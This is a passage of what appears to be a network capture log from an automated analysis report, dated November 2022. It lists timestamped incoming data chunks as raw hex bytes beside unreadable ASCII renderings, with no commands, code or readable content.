2022-11-07 22:49:05 UTC	6520	IN	Data Raw: 46 46 7a 51 14 db 09 d1 0f f6 47 13 aa 30 73 01 91 ef 70 76 5f 49 ff 85 30 f2 cf 7c 16 41 eb 14 13 78 b8 62 4d b6 1b 57 7b 5d e1 84 27 bd 80 64 dd 8a a0 c6 e1 04 a1 24 2e 47 06 67 dd 37 71 97 b2 56 26 01 60 e2 ed e1 44 84 63 57 49 7a 56 93 01 16 b3 07 39 90 68 7f 31 1b 5d cc 48 82 62 63 66 f3 dc 24 e4 02 b1 a3 5a e9 88 d6 d7 00 36 67 ba de 9f fe ad 6d 46 be 21 da de 0c 09 02 3c 77 23 46 16 94 6c 8d 29 2c 7a c0 2e d9 f8 9a 05 47 46 0b e6 5e 7a 02 8a 83 c0 9a b1 4c 93 c5 66 eb 9e 04 5c 4e 8a fa 34 66 25 15 22 ef 38 03 79 11 62 0d 60 84 87 79 bc 71 16 b3 37 ca df 0f 31 d6 91 c1 31 01 6f 22 0e 4d 02 23 9c f6 b5 6e d7 6c 80 c7 35 95 f8 64 82 c5 d1 69 4b ec 3d ee fa 36 d6 d4 24 66 55 29 7b 7b 2e 3d 11 29 c5 dd ec 7e 76 4d 28 77 3c f7 21 e6 13 5b 32 10 e1 f5 92 Data Ascii: FFzQG0spv_I0\|AxbMW{]'d$.Gg7qV&`DcWIzV9h1]Hbcf$Z6gmF!<w#Fl),z.GF^zLf\N4f%"8yb`yq711o"M#nl5diK=6$fU){{.=)~vM(w<![2
2022-11-07 22:49:05 UTC	6536	IN	Data Raw: 15 41 e6 20 51 4c d8 44 ed fb 3d 7a 3c c3 e8 e0 c4 91 00 55 fe b4 76 41 e6 c0 75 77 5c 3e f2 60 ee e7 89 72 02 61 0e 67 82 b2 79 76 0c eb 7f fd 58 9f a0 e7 2c f6 31 72 72 7d 7f 76 6a b8 27 22 8a 46 a2 ae a0 6a c1 a8 2a 7b 22 ce 73 53 65 d4 92 c9 e0 c6 34 ac e4 7d b5 3b fa 8d 92 f6 17 c7 c3 12 5f 8e f3 6d c0 07 98 7c ea 50 e5 55 2d b1 96 40 79 77 6a bf 5c a6 5f 83 1b b7 f9 8a c8 ac b9 de 2e 78 2e 64 f9 d3 72 ef 89 2a 0d 61 87 fb 2a 48 3c 79 58 fa 5b 1f 06 63 25 2a 63 78 c9 6c 01 fb 7a 04 00 e7 6f d0 cc 3f 19 66 f0 32 f1 bf bb 2b 53 09 dc 80 64 f7 be f2 fd d5 de a7 47 58 82 21 2f e8 ac dd b3 8d 54 a1 b2 ff f0 40 99 a7 56 f7 55 e4 ca 32 2f eb 73 dc 6c 0d 33 6d fc e8 86 ee 79 52 7e 8c b8 63 a6 f9 5f ae fa 54 76 17 12 b4 2b a4 0b 81 b8 24 3a f7 06 59 62 8a 2b Data Ascii: A QLD=z<UvAuw\>`ragyvX,1rr}vj'"Fj{"sSe4};_m\|PU-@ywj\_.x.draH<yX[c%cxlzo?f2+SdGX!/T@VU2/sl3myR~c_Tv+$:Yb+
2022-11-07 22:49:05 UTC	6552	IN	Data Raw: 0a 4a 31 d6 17 23 f5 79 91 50 4b 57 1f 87 57 ad 6c fc 7e 31 34 a1 03 b3 34 77 93 4e b1 23 46 0c cf d6 8d fb 1d 82 f7 77 79 73 8a 9c 4a 48 45 2d 0e 51 b1 0d 26 f4 e9 6e 64 30 2d 05 22 b9 a8 b6 eb f3 ea 60 3f f4 7a e4 fb 8e 69 df f0 bd 9b 3e e9 6b d8 3f 78 f0 c8 04 83 36 f0 40 f3 15 9d 65 22 52 a0 23 01 0f e0 d3 f9 53 b8 a8 65 47 a9 d1 e6 31 c8 55 13 c9 3f 67 7b f2 5d af 51 5c 5a 1b 56 79 64 ab f9 31 09 c6 bd 15 2f ce 7c 08 c8 62 ae 6a 78 32 fc 78 35 5b bc f4 38 97 c3 df 97 95 e5 91 26 0f 66 e7 67 10 6e 15 a3 6d 3a 10 64 3e 92 e6 d3 79 ce cf 49 60 48 7b d8 d1 48 e9 74 64 47 6a 02 38 19 5f 1a c9 ba f4 d5 aa e3 e8 c8 cf 71 84 c0 54 e0 fd 44 eb 0c 63 c4 f7 bb c0 05 e7 b7 30 18 2f d1 51 3e 48 90 c3 70 eb 19 da 07 37 25 9e 35 dd dd 9c fa 86 66 f6 f9 49 a5 d9 0d Data Ascii: J1#yPKWWl~144wN#FwysJHE-Q&nd0-"`?zi>k?x6@e"R#SeG1U?g{]Q\ZVyd1/\|bjx2x5[8&fgnm:d>yI`H{HtdGj8_qTDc0/Q>Hp7%5fI
2022-11-07 22:49:05 UTC	6568	IN	Data Raw: dc e5 fb 70 65 ac ac 0c 63 dc c7 4e c9 a1 f3 bb 71 9d f0 8e 63 7c 52 b1 9b f1 b0 b6 33 69 b5 c6 31 de 08 98 80 3a 18 52 4f 20 74 50 7b 10 66 2d c4 85 54 2c 28 e4 6d 6f 3b 57 56 31 eb 6f 06 7b a4 78 4f 6a 33 1f 3e 2f 30 7a f5 0e 59 90 a7 7c a0 7c f1 7d ad 46 16 52 94 9e 59 f5 ee 44 69 7f e3 6c e8 d4 d9 09 e7 5e 5c ac 43 7c be ac 7e 73 40 00 7c b5 4d 86 18 4e 16 2f 7a b2 e3 55 ce e0 79 7a b3 6c 33 56 2d 43 36 14 6e ab 22 47 66 03 54 84 52 34 78 55 b0 52 b7 64 17 65 26 1f 42 40 6a 43 b5 00 b1 0e 8c fe 5c 5d 14 31 7d 00 29 4e 4e 01 b5 75 2f 2c d2 6c d2 2b 16 5e 2a c0 fb 45 aa 9e 58 18 e6 f7 e2 7f ea 51 71 28 41 a6 96 f4 fc 6a 9b 5c d5 55 28 65 14 18 34 26 12 17 a2 1b 79 3f d7 5d 72 5d 48 69 4d d3 b1 be 6a ee 5e 10 da c1 f9 65 93 34 35 eb 41 66 c9 e0 23 dc c0 Data Ascii: pecNqc\|R3i1:RO tP{f-T,(mo;WV1o{xOj3>/0zY\|\|}FRYDil^\C\|~s@\|MN/zUyzl3V-C6n"GfTR4xURde&B@jC\]1})NNu/,l+^*EXQq(Aj\U(e4&y?]r]HiMj^e45Af#
2022-11-07 22:49:05 UTC	6584	IN	Data Raw: 21 61 c3 54 18 7c 4d 54 10 78 4b 60 73 6a 82 0b f8 4e 67 54 71 d2 b0 5a 44 a5 9e b7 72 50 72 c7 1b d6 f1 de b5 c5 f6 3d 7e 15 68 7f e4 6b 7f 43 8d 79 e4 f9 5e ef 8e 35 45 70 e5 3e 2b 61 7e 71 38 59 f1 1b 00 7d 53 0d ea 40 bc 78 56 e5 e2 16 bb 2e ce 22 ec e7 b3 eb 47 a8 16 75 42 b9 ce 90 0e 4c 4b 78 3d 22 8e 68 b1 ce 3b 66 60 64 e4 d0 b9 55 40 ec 23 15 2d 75 a5 90 19 7f db 77 5b 3e 66 ab 71 be 1b cc 6a 2e cc 25 08 12 16 bb 7b 51 b2 39 14 d8 05 57 49 a3 55 4a 38 af 52 a2 6d 09 28 9d 43 10 8f 13 ac ef 6c a2 8c ff d6 6b 23 b3 9f 79 ca 16 1e a7 aa 88 b4 31 c9 97 69 77 31 2e a6 ca 98 44 99 5f 07 c9 bb 7f a8 fc b2 c3 b1 c7 3f ee f2 13 71 68 e1 45 6c bb 29 bf ea 2f 56 39 43 c9 7c bb 50 06 19 27 05 a4 fe 2f 56 1c dd ca 08 c8 a0 e1 28 8d 45 84 39 54 c4 c1 42 06 79 Data Ascii: !aT\|MTxK`sjNgTqZDrPr=~hkCy^5Ep>+a~q8Y}S@xV."GuBLKx="h;f`dU@#-uw[>fqj.%{Q9WIUJ8Rm(Clk#y1iw1.D_?qhEl)/V9C\|P'/V(E9TBy
2022-11-07 22:49:05 UTC	6600	IN	Data Raw: 72 65 d8 ba 38 14 34 60 e3 3e d5 5c d1 57 85 29 78 3d 01 27 47 a7 4c 49 0c 60 d8 27 c4 7b 3c 7f e5 f9 18 67 0b dc 86 c5 ee 05 1a 22 7e 64 51 2c 95 bd c1 e5 60 57 cb f6 ef a2 35 30 78 29 67 5c 1b a1 5a e6 7f 1b 35 87 3b b5 34 05 26 cf b9 71 ce 60 29 78 5d ed 63 5a 6b 2c 66 be c8 2f 44 2b 0f 19 b2 41 61 23 dc 74 65 03 d6 4c ee 7c 7b c9 8c e3 74 ce 30 22 01 fe 1d d2 7c c8 07 74 79 a1 cd e7 71 67 38 08 1c c4 1d 5a 33 fb 78 29 11 3a db b7 d4 84 6c e7 a0 ab d3 3f f8 03 78 ad 82 3f 94 09 ba d8 4a 00 ab 72 69 a1 ec 31 75 1f de fd ce 63 26 24 ed a0 74 7c 57 78 36 ca 3d 1a 0c ab 8e 9a 57 00 92 43 f8 76 99 b3 29 e5 77 58 34 2b 08 10 5b e1 a8 6d 83 e9 39 ea 3e e6 02 f0 72 81 05 d8 b9 2a 51 57 2e 76 4e b4 47 33 5f 08 53 77 a1 7f 76 ee 61 ce 7c 5e 80 62 75 2d 37 ae 46 Data Ascii: re84`>\W)x='GLI`'{<g"~dQ,`W50x)g\Z5;4&q`)x]cZk,f/D+Aa#teL\|{t0"\|tyqg8Z3x):l?x?Jri1uc&$t\|Wx6=WCv)wX4+[m9>r*QW.vNG3_Swva\|^bu-7F
2022-11-07 22:49:05 UTC	6616	IN	Data Raw: 66 28 16 a9 7f b4 cd b1 6a 74 ed c6 0b 1e 77 e2 35 3f 00 8c 8c 08 1b ee 6d 37 0c 0e a2 1f 30 97 7e e8 6c 36 79 23 0e e2 9e 39 52 fd d9 a1 7a f8 a5 6e 64 99 49 8c 57 e9 28 70 76 4c da 6e e7 ee 36 71 ae ff b0 22 57 85 53 51 55 b2 1f f2 f8 0f 71 37 da 00 f2 5f 8a 5f fd e8 86 73 5f cb c2 d8 2b 0a 86 79 42 4d 35 c4 22 38 e9 52 56 5e 65 ea 7c 97 3f f3 51 c9 5b 25 f6 09 86 75 56 01 06 60 ef 7b 47 93 30 25 a8 0b 42 fb 1f 2e d2 b4 91 62 6a 63 fd 3f fd b7 23 3a 51 df 4d 82 67 91 ea 1e a0 fb 4b d4 85 ac ae 24 ed 93 40 c4 02 68 46 4f 35 70 55 7a 29 dd 75 47 fb 3b 7c 89 3e a6 f8 a5 24 6e bb 80 86 4f 35 80 7b 61 22 2a eb 25 09 72 bc 85 2f b5 7e 57 53 7c 87 dd bd 41 7b a3 fb d8 be 64 fe 7b e2 7a 34 fe 7c 39 b0 3d ec 3b 76 3a 89 f5 48 42 52 fe 7a 3a 60 d1 b3 6d 2b 4d b7 Data Ascii: f(jtw5?m70~l6y#9RzndIW(pvLn6q"WSQUq7__s_+yBM5"8RV^e\|?Q[%uV`{G0%B.bjc?#:QMgK$@hFO5pUz)uG;\|>$nO5{a"*%r/~WS\|A{d{z4\|9=;v:HBRz:`m+M
2022-11-07 22:49:05 UTC	6632	IN	Data Raw: d3 25 34 68 01 ef c9 63 8d 65 24 fa c7 6d f6 72 f8 85 4e 12 55 9f eb d9 e4 3a 04 38 a9 c5 b0 4e f5 7a c0 38 63 84 53 a5 9e d5 fd db 4f b0 c2 43 dc 40 0d a7 07 47 d1 cb 0f 80 81 51 d7 bb 1a 5b d2 a3 3e e3 80 da f1 b4 cd 4f 2c 50 16 ba 3e 91 1f f2 04 2f f1 83 f4 dd 35 b6 3a 3e e8 94 03 fb 66 dc 38 25 a2 6e dc f4 28 62 65 c4 08 45 2d 94 47 40 bb 32 57 63 b4 76 b9 42 e6 44 c6 bc 2d d0 2e be 67 6d 89 df fc 22 98 6a 9b 8c ee 20 e5 ea 40 7f db 1d 6f 7e 11 61 7c 01 2c 26 4a 65 f3 60 2f 4a 77 34 20 0a 0c 4d 2d 35 57 2e e5 b4 96 9b 1b f2 0b b1 ff 1f 1e 06 ab 26 f1 1e 61 ce ff 38 96 8b 41 18 d9 14 4d 11 51 f8 e6 5d 06 05 b2 89 12 57 b1 5c 0e 12 6f d6 e5 e2 5f c7 24 9e 3c 88 76 4f 3d a2 2b f7 54 6f d4 7e 94 1e 53 ab d8 03 f3 50 51 3d 61 eb 7b 59 d0 22 78 35 e3 68 c9 Data Ascii: %4hce$mrNU:8Nz8cSOC@GQ[>O,P>/5:>f8%n(beE-G@2WcvBD-.gm"j @o~a\|,&Je`/Jw4 M-5W.&a8AMQ]W\o_$<vO=+To~SPQ=a{Y"x5h
2022-11-07 22:49:05 UTC	6648	IN	Data Raw: 7b d1 2a a2 ce d7 19 9b f3 40 ab 8c 49 fb df 25 6a 56 5f 61 f6 c3 dc 4e 63 5a 26 6b a0 5a 77 f5 01 98 a1 a8 f0 26 e2 df b7 a5 22 90 a2 1e 79 fc b4 78 e3 08 af 15 a3 a5 96 fd 6f 81 db 17 bf a3 62 82 24 37 9f 42 86 60 16 84 97 20 e5 f9 7f 7f c8 ca 29 51 64 03 17 f1 05 69 72 90 87 f3 99 63 64 e0 6f 75 69 9b ff 7c 31 75 73 6a 94 14 b3 a5 71 d4 bf 25 44 85 a2 dc 33 0d 54 b6 77 d7 ba ad 24 29 de 57 68 c9 99 af 42 4b d9 6a 33 75 15 59 8c 62 35 2a 58 bb 2a 18 b8 34 1a 46 9a 41 74 5b bb ea 74 61 af 49 aa e0 39 e5 12 4a 5e 20 f4 c5 6f 0e 23 92 80 ec 92 67 34 cc 55 74 6f c5 52 10 de 26 26 a9 5e 2c 0a f4 44 2f 88 ae 60 d9 7a 13 c6 d4 5d 0c 62 85 45 ce 72 d7 24 e1 8e b2 1a 0c 38 f4 10 27 47 f1 31 11 b5 9f 9f 79 4c 6e 74 13 77 1d 83 23 3b 15 53 5f 8b 49 34 05 30 20 24 Data Ascii: {@I%jV_aNcZ&kZw&"yxob$7B` )Qdircdoui\|1usjq%D3Tw$)WhBKj3uYb5X*4FAt[taI9J^ o#g4UtoR&&^,D/`z]bEr$8'G1yLntw#;S_I40 $
2022-11-07 22:49:05 UTC	6664	IN	Data Raw: eb d6 c6 35 52 1e 75 20 b0 14 ee 87 f6 c0 da d3 1f a6 3c 2e 04 3b 24 f8 09 f9 0d 30 24 f6 e5 5b cf 2f f3 e5 88 53 e3 74 65 95 d7 7e 45 c8 85 41 1f 15 19 12 0a cc 1f f1 d6 a1 7d 1a 78 69 19 44 c2 9a 43 b0 c8 b0 88 4c d9 3f b9 cc 4f 6e 2a e4 a5 9b d0 53 24 7b 8d e4 52 63 34 1c 3d be 3f 63 e0 a1 ee a7 99 ea 34 67 36 12 29 31 51 b8 99 46 0b 25 80 15 1b 59 e1 2e 7d 70 d9 37 8e 35 78 bb af a8 9b a8 67 92 2a 6e 40 00 14 9b dc d8 68 31 33 dc 35 a4 2c f2 4c 51 74 5b f7 d2 42 40 f7 1f bc 6f 59 fd 74 68 f3 ea fe 50 62 cb 91 89 73 36 a2 7c 65 9a 28 77 b8 4b 59 39 5e 1a 40 01 f7 ab f3 a7 e1 43 be 0d b3 a5 5a c3 62 11 c5 5e 71 b3 e6 8f 0e 41 71 41 ff 7e 78 ef 46 99 e9 c5 5a 80 a7 fd a1 95 40 ee d5 d9 4b a7 4a 26 20 22 2d 11 eb 4f 21 6b 0c 77 c4 94 8a 4f 26 f7 db 74 c4 Data Ascii: 5Ru <.;$0$[/Ste~EA}xiDCL?OnS${Rc4=?c4g6)1QF%Y.}p75xgn@h135,LQt[B@oYthPbs6\|e(wKY9^@CZb^qAqA~xFZ@KJ& "-O!kwO&t
2022-11-07 22:49:05 UTC	6680	IN	Data Raw: ad 6c 0a f8 47 77 7c 69 66 3c a7 72 65 d8 a1 b5 ed 38 b0 eb 5b 26 08 f0 05 0d fc d7 84 5e 5e a9 fb ee ad ed d3 b7 8a e5 1e d6 0e 2e b8 55 03 eb 58 8f fc 94 2c f0 40 6e 65 40 79 54 fa bb 9d 23 87 6a 77 39 49 92 66 c6 aa 6d 67 ad 40 2d 3b 36 4e e5 a1 da f7 d7 b8 6b dd 82 f9 23 49 f4 8c 9b 87 d6 35 c0 23 24 82 9f 7b 8a 86 fe c2 39 30 ea 52 61 7c 39 2b 6e 7c c9 64 e5 5b 3f d9 b6 e7 f1 74 29 68 f1 d8 35 3a 68 9a 72 ec 6d 48 66 d5 7d de dd 45 6b 6a 3f 1f 78 79 a2 d2 f8 6b a5 52 22 4f eb 72 6b 34 7c 3b 75 60 e1 8b 0b 28 5c 7a 86 88 3c 53 41 6c d4 3b 90 54 8b 73 7a 87 66 57 3d 4d ed 13 09 2e ce 3d 85 6b 65 07 05 67 7b 38 b9 6d 73 50 ec 87 54 ed eb 2a 2a 05 c0 74 88 38 73 e6 71 d6 7a ec 84 89 36 8b 19 24 f7 28 78 a1 9b 70 22 f0 69 84 2e 7f 86 b4 fc b9 96 12 80 22 Data Ascii: lGw\|if<re8[&^^.UX,@ne@yT#jw9Ifmg@-;6Nk#I5#${90Ra\|9+n\|d[?t)h5:hrmHf}Ekj?xykR"Ork4\|;u`(\z<SAl;TszfW=M.=keg{8msPT**t8sqz6$(xp"i."
2022-11-07 22:49:05 UTC	6696	IN	Data Raw: 06 fc 58 33 e9 48 94 32 3b b5 c0 4a 69 b5 32 b1 e8 10 97 20 56 13 d1 18 84 f8 7e fc 36 f6 52 d7 8c cf 39 c7 13 7f 7c 72 67 1f 95 6c d0 2d 99 29 e7 e3 f9 80 43 12 7a 95 95 69 8e 51 b0 8a ec 0f 6d 6e 34 0a 78 37 6d 9f ed 1c 96 c2 46 42 7e 05 47 5f 60 44 ee 33 54 9c 01 39 34 73 e5 4d a6 3d bf 1c 56 5a 63 2b fb fb 28 f0 25 8f 2c 78 33 37 f3 c6 b9 56 bf 98 69 1a b5 ab 74 07 50 f0 53 77 e4 76 14 5a 83 bc ec 8b 05 d0 6d 6a d6 77 01 7d f8 f8 56 70 ad 63 a1 10 6e a8 70 ed 07 c1 ad 7c bf f5 81 39 33 f6 b6 1b 55 59 4b 63 c4 ec aa e2 10 f3 14 4d 33 0e b7 59 c4 06 70 9e dd ba 13 26 1a b1 69 1c 80 27 61 20 c8 f6 28 6f 29 e8 e3 7e 1a 9d ac e7 18 01 ac 5f 04 71 86 64 9b 08 8e dd b3 42 7c 2d 33 03 22 61 67 c5 0c 32 62 24 2d 10 20 fb 10 64 d4 10 46 01 58 48 63 14 ea 4e c6 Data Ascii: X3H2;Ji2 V~6R9\|rgl-)CziQmn4x7mFB~G_`D3T94sM=VZc+(%,x37VitPSwvZmjw}Vpcnp\|93UYKcM3Yp&i'a (o)~_qdB\|-3"ag2b$- dFXHcN
2022-11-07 22:49:05 UTC	6712	IN	Data Raw: 0f f3 de 11 79 77 70 20 66 f1 0d f4 c0 20 59 53 34 a2 46 66 f7 9c dc 46 76 77 51 c7 2e ca 4a fe 4d 45 53 48 71 5b 60 4e 35 96 0d de 52 43 41 58 44 13 5a 36 15 4c 2a 5b c2 c9 6e 9b 37 ff 32 40 2e 79 0a c9 cc 7a 36 b5 6c 3f b8 c2 f9 20 5e a1 28 a6 36 4d 9e 61 27 45 e7 29 d5 0c 42 71 ea 2c 50 0d 77 4c 0d 39 14 27 2a 2f e9 39 05 30 5f f2 59 27 ea 58 bf 69 78 9b c0 6f 7d e9 27 f6 d0 f6 80 71 18 70 71 0b 60 0c b7 d6 dd 5a 76 44 6d 43 60 3e 03 0c 42 53 76 55 54 79 ae 2b f9 5d 52 2b 36 65 97 e1 e1 1f 0e 46 b4 05 30 72 36 be d4 a3 52 71 66 3d d4 85 b1 1d 77 f9 1d 52 bb 3d 66 1d a0 04 24 42 6d 0a 58 fe 37 00 ff 4a 46 64 04 13 bf 77 32 65 00 12 52 49 6a 67 a8 ff 08 21 12 55 a6 35 14 58 e3 d8 f6 8f 02 9d 5c 52 b4 44 82 69 66 18 62 18 04 a1 e1 30 02 ba 67 6f 26 73 b0 Data Ascii: ywp f YS4FfFvwQ.JMESHq[`N5RCAXDZ6L[n72@.yz6l? ^(6Ma'E)Bq,PwL9'/90_Y'Xixo}'qpq`ZvDmC`>BSvUTy+]R+6eF0r6Rqf=wR=f$BmX7JFdw2eRIjg!U5X\RDifb0go&s
2022-11-07 22:49:05 UTC	6728	IN	Data Raw: 90 34 b3 7c 31 28 57 10 93 5e 6b fc de cc 59 6a 79 64 ca a7 d9 44 6d c2 54 fc ac 32 78 62 1a 0b ab b8 27 fc 07 e7 36 a5 9b 72 27 29 26 b7 33 cb 62 f3 8b 35 f7 b7 a9 08 1b 8e 3b 73 1f 6b 6c e4 79 75 c7 cb 3c a9 61 64 3c 90 64 2e b3 c5 bf 41 f4 b7 09 48 88 13 a6 9a 6d f9 e6 ba 2b a1 55 a3 10 69 58 ad 24 52 7f 5e f8 e1 97 c7 cd e8 fa b4 06 b7 83 03 fc 77 92 d2 e4 f1 c1 9c c3 6f 9c 9c 8d 6a ab 5a 7b b8 2d e7 59 c9 49 60 65 c5 65 b0 29 9a 57 a8 db e8 be 0c c7 0c 20 dd 35 69 49 e0 35 3e 6a 88 6c b2 35 45 ce 41 b2 da c6 33 dd 7d b1 3b 2b 63 14 78 d5 49 15 f7 c4 04 44 1f 5a 22 e1 7c 78 a4 71 4d bd 25 41 6d b4 53 da 47 7b 0b e4 9c 78 e5 df 74 e8 ab f6 f3 cb c8 5c 61 cc f0 80 e4 20 c1 36 23 55 80 ea c4 b7 17 56 05 f9 43 6a 4d 68 c0 2b 69 53 4d 5c 40 20 73 f8 0c 97 Data Ascii: 4\|1(W^kYjydDmT2xb'6r')&3b5;sklyu<ad<d.AHm+UiX$R^wojZ{-YI`ee)W 5iI5>jl5EA3};+cxIDZ"\|xqM%AmSG{xt\a 6#UVCjMh+iSM\@ s
2022-11-07 22:49:05 UTC	6744	IN	Data Raw: 39 03 29 34 f9 50 0c 25 78 fa 2b 0b ee e0 f5 41 5d 7b 54 1b ca 23 0d 5d 73 78 20 2f 38 bd ad 6d 76 b1 ef d5 50 75 94 60 78 ac 34 6d d4 18 0c 0e 07 f6 78 d1 e7 f0 04 d1 22 b0 4f 98 f3 a3 c9 4f 3d 2f 00 cd 38 af 1a 8e 34 33 95 53 0c 69 54 6c 24 d6 47 2c fd 30 ad 24 4d 5f d3 b4 09 40 c6 eb f3 9f 51 79 f2 37 5d 64 e2 d6 61 af dc 64 5d 6e 9f 25 28 39 fc ee 99 65 17 0d 60 98 f9 eb 73 f8 79 77 aa 39 21 e0 7a 14 4c f5 50 56 5e 61 e4 43 5c f5 52 e3 5c a9 a1 ad 5f 68 70 eb 24 61 c4 7b 6d a3 0d 5b 46 78 5c db ff 62 b4 24 47 8c ee 1a 92 f8 3a ee 79 31 26 48 da c6 33 7c b4 53 de 96 20 07 d7 51 24 be d3 78 0a 11 21 7a 20 f6 a1 d2 b9 47 54 39 04 af 1f f9 72 fd d2 7a 5b 1e d2 5f e2 55 f1 1f 71 ed 3e 20 a3 0b b9 e3 c6 ec 71 de f6 2a 17 46 7c 42 43 f8 e4 5d 65 56 2c c9 33 Data Ascii: 9)4P%x+A]{T#]sx /8mvPu`x4mx"OO=/843SiTl$G,0$M_@Qy7]dad]n%(9e`syw9!zLPV^aC\R\_hp$a{m[Fx\b$G:y1&H3\|S Q$x!z GT9rz[_Uq> q*F\|BC]eV,3
2022-11-07 22:49:05 UTC	6760	IN	Data Raw: 62 07 4b f5 32 cf e7 f1 56 0f 7c be 77 8e 21 a0 f1 8d dd 5b 14 3f de 4e 64 3d 29 78 dc 5d 32 e0 a6 67 46 41 d5 a9 ff 4b 62 56 a4 de eb 78 58 05 9b c5 74 81 fa 37 1c 75 34 76 25 ce 0d e9 17 eb 38 6f 37 97 05 26 bb fc 68 93 b6 27 83 8e 28 03 4a 47 74 b8 c2 9f a4 ed 1c 78 75 82 22 97 2c 19 b4 55 57 93 8b a2 70 04 7f 8b c5 41 41 72 78 5d 36 a8 7c 76 47 52 8b 8f eb 71 0a 32 e7 40 f0 ca 62 89 ab e8 28 c5 5d 7c 54 43 44 17 df 7f 6d ab e5 ca f2 40 72 5b 8c 87 43 35 68 50 5f ef 46 8d 85 7d 33 4e 40 3f e8 87 cb 79 41 6d 67 5d 45 3e 59 68 c1 b7 ef b0 5e a5 31 f9 72 48 22 71 26 eb 57 2b 1e 31 a2 6d a0 ec 01 1b b1 93 96 55 55 f7 9f af 35 f6 e7 e2 28 e0 fa b4 62 70 8a fb 9f a9 12 f2 60 55 05 37 54 b4 78 2f 6c b5 e3 8e 3f cb 7d 2c 0d 18 48 f5 eb 7c 63 4b 57 f2 6b 61 24 Data Ascii: bK2V\|w![?Nd=)x]2gFAKbVxXt7u4v%8o7&h'(JGtxu",UWpAArx]6\|vGRq2@b(]\|TCDm@r[C5hP_F}3N@?yAmg]E>Yh^1rH"q&W+1mUU5(bp`U7Tx/l?},H\|cKWka$
2022-11-07 22:49:05 UTC	6776	IN	Data Raw: 40 a9 bc 4e 74 73 87 6d 23 79 e1 2e 3b bb 7f 6d 7e ae bd 37 63 30 da 35 fd 8e df ef 11 69 80 6d a4 10 36 e6 d8 b8 8e 89 40 5e 51 64 19 e2 fe a5 93 7c 71 e4 80 52 07 b0 40 68 ba 1a 51 40 e1 8c d5 ab 54 79 0b 43 bd a0 71 51 4b 36 72 6b 5b 61 73 aa e1 22 a4 3c b4 7a 89 28 fc 3b 43 f6 40 00 63 f9 8e 32 6f c8 3d 10 62 e1 65 f6 00 33 29 36 23 5b b7 29 a6 40 96 05 76 55 18 95 1f c5 70 32 76 65 fa c7 72 d0 a7 ad 6a c1 53 3f 7b 70 fe 31 5e e5 1e 67 ab 37 d3 e1 68 1b a6 da 33 43 19 78 4f 0d 7a 7b 08 8d b0 2c 44 8c 11 6b e6 32 d7 6e 4e 6a 60 85 0d 36 2e 12 62 52 d3 52 4b a0 74 5a e7 f9 6b b4 a2 93 10 0d 38 19 3b 25 5f 1d 6d 63 00 67 70 e1 2e da b6 69 e6 41 12 8f 86 2e 79 cf fd db fa 6e 71 9c b5 c4 94 be 4a d0 0c 6a 72 7e 12 bc 0b c2 1e 72 78 b9 47 a2 c8 0c ea f5 0f Data Ascii: @Ntsm#y.;m~7c05im6@^Qd\|qR@hQ@TyCqQK6rk[as"<z(;C@c2o=be3)6#[)@vUp2verjS?{p1^g7h3CxOz{,Dk2nNj`6.bRRKtZk8;%_mcgp.iA.ynqJjr~rxG
2022-11-07 22:49:05 UTC	6792	IN	Data Raw: 5b fb 3c 0d e7 24 e5 74 93 5e 2a 4e fc 09 5a d4 37 4f 58 a4 ad 5c ec e2 47 5e 7a f3 21 01 a4 41 37 68 c1 f5 61 44 2f 24 7c e5 75 fc ae 70 f8 b1 32 5a 41 4e 32 e3 cd 25 ba 18 98 c2 88 01 3f 88 7b 52 68 e9 40 42 38 75 0b 83 5c b6 ce 41 61 46 ac 74 cc b0 0c 38 f3 de 72 d5 60 ea 00 37 44 a4 25 41 74 2a ed cf bf ab a1 82 c9 cc d3 a3 38 a6 56 76 f9 f8 da 58 1b 8c fc 6c be 6a c9 75 71 7c 82 3b ab 22 b5 7f 3b a7 1e eb 7c 7f ad 0c a2 19 7b 26 05 ce e2 e9 e1 6c 8d b2 70 2f 6f 53 da f3 4d 84 92 d5 3f 68 57 ce 3b 07 a8 96 d5 d8 de b0 4a 49 af 26 51 36 61 27 0f 09 a7 a2 b0 84 e7 fb 52 0b e7 1a 64 6f dd ab cd 98 0d 8e 38 04 37 6b 5c 24 31 19 6c d1 8c 5d 50 18 38 a7 49 21 9e 3f ed 5c 09 96 e9 d5 13 15 3b e1 54 0e 8f 7a 4f 0b 35 2f d5 25 0d b8 38 2d 7f 3f 64 8b 03 23 59 Data Ascii: [<$t^NZ7OX\G^z!A7haD/$\|up2ZAN2%?{Rh@B8u\AaFt8r`7D%At8VvXljuq\|;";\|{&lp/oSM?hW;JI&Q6a'Rdo87k\$1l]P8I!?\;TzO5/%8-?d#Y
2022-11-07 22:49:05 UTC	6808	IN	Data Raw: 45 7d e7 97 73 0c 0e e5 50 fa e7 ae 03 71 76 01 c9 f9 fb ed 49 3c 9d c5 9d fa 21 43 6c 6a 1a b6 1e 4d 69 44 43 d6 5c b4 bd 65 6a f6 1d 35 6a 16 30 31 58 ec 56 e8 35 67 28 72 19 2c f2 ce 5d 01 0f f3 23 ea 56 22 64 b4 e9 df 0d 2b 5b 70 65 49 9a 7d c8 24 b6 ea 62 50 ea a5 f8 3d 7c f9 de a8 f9 29 f3 e1 31 b3 62 00 98 a0 d2 4e 29 65 df 3f 2c 6f f1 e4 6a a7 5b ed df cc 27 90 f3 61 87 f8 f8 c3 3f 46 61 39 8c e1 88 23 4e f1 55 97 a0 ab e3 f5 eb 66 9c a6 7e dd b6 c6 ad 69 2a 58 2e 4b 3c 28 35 c7 68 78 25 22 10 cb 32 66 eb 01 92 ad 3f 79 ba 8e 7b 77 7e 58 f4 65 22 cd 4e bc 88 21 fa 28 41 64 a0 22 62 a5 0e 78 1f 5e c8 7a fa 9a 1a 8d 74 77 a2 3e 3c fc cf 2f 36 61 55 a9 29 c1 53 63 69 b8 71 73 73 90 58 13 18 57 7f 1c 74 6e 50 93 8e f7 49 3d 9b 86 7c e6 7f 5f be 75 b4 Data Ascii: E}sPqvI<!CljMiDC\ej5j01XV5g(r,]#V"d+[peI}$bP=\|)1bN)e?,oj['a?Fa9#NUf~i*X.K<(5hx%"2f?y{w~Xe"N!(Ad"bx^ztw></6aU)SciqssXWtnPI=\|_u
